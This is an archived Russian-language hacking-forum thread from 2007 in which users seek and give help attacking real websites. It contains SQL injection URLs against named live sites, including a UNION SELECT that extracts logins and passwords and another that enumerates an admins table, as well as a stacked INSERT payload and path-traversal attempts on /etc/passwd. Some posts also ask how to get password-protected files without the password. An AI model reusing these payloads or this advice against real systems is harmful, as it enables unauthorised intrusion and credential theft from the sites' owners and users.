ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.12.2007, 13:59
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
Вполне согласен со Scipio.
Возможно сначала идут 2 разных запроса, получают оба результата, и только после всего этого выводят в html.
И если какойто запрос не выполняется то exit(mysql_error());
имхо
Юзал недавно багу на 1 сайте, линк не помню, в общем посмотрел конфигурацию хостера - мускул 4 версии
|
|
|
04.12.2007, 22:48
|
|
Постоянный
Регистрация: 04.12.2007
Сообщений: 424
Провел на форуме:
2364957
Репутация:
479
|
|
есть такой запрос
INSERT INTO `login` (`userid` , `user_pass` , `sex` , `email` , `state` )
VALUES ('user', '1234', 'M', 'a@a.com[sql query]', '0');
собсно, вопрос: можно ли как-нибудь приписать туда свой запрос? у меня получалось добавить только такой же insert
e-mail=a@a.com','0'),('asd','asd','M','b@b.com','0') ;/*
но, хотелось бы чтонибудь более существенное, или инсерт, но с большим количеством столбцов.
вроде так
Последний раз редактировалось ntldr; 04.12.2007 в 22:50..
|
|
|
|
04.12.2007, 22:54
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
Подскажите как можно решить вопрос с информацией по названию каталогов на сайте ?????
Есть SQL inj: http://kojyhovo.ru/news/news.php?id=-81+union+select+1,concat(login,char(58),password)+ from+users/*
но не могу найти админку может кто подскажет.
load_file('') не работает!
Заранее спасибо.
|
|
|
|
05.12.2007, 01:08
|
|
Участник форума
Регистрация: 08.09.2006
Сообщений: 194
Провел на форуме:
1627025
Репутация:
163
|
|
Возможно ли тут раскрутить иньекцию?
http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--
|
|
|
|
05.12.2007, 01:23
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от LolFEm
Возможно ли тут раскрутить иньекцию?
http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--
Это вобщето инъекция в MSAccess...
теоретически раскрутить можно:
Код:
http://www.rochesterautodealers.com/news.asp?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20admins
подбирай таблицы, прав на чтение системных таблиц нет
З.Ы. вобще .Slip в чем то прав, но это так, мысли вслух ни к кому неотносящиеся
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 05.12.2007 в 01:30..
|
|
|
|
07.12.2007, 11:49
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Вот мне интересно, что за дыра
http://sait.ru/index.php?fuse=admin&view=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd
В ответ вообще хз, что вылезло.
An error has occurred with the given operation
Fuse: admin
Action:
Type: User Error (256)
Description: View .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist
Script: /var/www/saitdata/www/sait.ru/newedge/classes/NE_Controller.php
Line Number: 88
Stack:
/var/www/sait/data/www/sait.ru/newedge/classes/NE_Controller.php (88) : trigger_error
/var/www/sait/data/www/sait.ru/newedge/front.php (72) : ne_controller:  rocessview
/var/www/sait/data/www/sait.ru/index.php (3) : require
Попробовал по другому.
http://sait.ru/index.php?fuse=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd
Вышло следующее
Module .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist or hasn't been properly installed
С таким никогда раньше не сталкивался.
Последний раз редактировалось Ershik; 07.12.2007 в 11:52..
|
|
|
|
07.12.2007, 11:55
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Дай нормальную урлу - тебе скажут... Так возможный инклуд... Видно, что в скриптах используются свои обработчики ошибок... Что можно сделать - ХЗ. Урлу в студию.
|
|
|
|
07.12.2007, 11:57
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Ссылка удалена
Последний раз редактировалось Ershik; 11.12.2007 в 09:47..
|
|
|
|
07.12.2007, 12:05
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
В параметре fuse ничего нет... Всё отфильтровано.
|
|
|
|
09.12.2007, 16:11
|
|
Новичок
Регистрация: 07.12.2007
Сообщений: 1
Провел на форуме:
24705
Репутация:
0
|
|
- Существует ли способ скачать запороленный файл с ifolder.ru? Естественно, не зная пароля. Может есть какая-нибудь уязвимость?
- Есть ли уязвимости в гостевой книге "SR + Denied Guestbook v.2.1.5"? В ранних версиях присутствовал баг с файлом passwd.dat, и XSS был, но в этой версии не пашет.
Последний раз редактировалось KyKypy3HuK; 09.12.2007 в 22:10..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
